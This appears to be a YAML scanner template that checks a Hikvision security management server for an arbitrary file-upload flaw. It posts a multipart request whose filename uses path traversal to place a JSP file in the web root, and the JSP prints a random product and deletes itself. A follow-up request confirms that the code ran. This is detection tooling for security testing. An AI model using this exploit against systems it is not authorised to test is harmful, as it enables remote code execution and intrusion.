name: hikvision-anfang-report-fileupload-2
set:
  randstr: randomLowercase(10)
  r2: randomInt(40000, 44800)
  r3: randomInt(40000, 44800)
  rboundary: randomLowercase(8)
rules:
  - method: POST
    path: "/svm/api/external/report"
    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
    body: "\
      ------WebKitFormBoundary{{rboundary}}\r\n\
      Content-Disposition: form-data; name=\"file\"; filename=\"../../../tomcat85linux64.1/webapps/els/static/{{randstr}}.jsp\"\r\n\
      Content-Type: application/zip\r\n\
      \r\n\
      <%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n\
      ------WebKitFormBoundary{{rboundary}}--\r\n\
      "
    expression: |
      response.status == 200
  - method: GET
    path: "/els/static/{{randstr}}.jsp"
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
detail:
  author: 666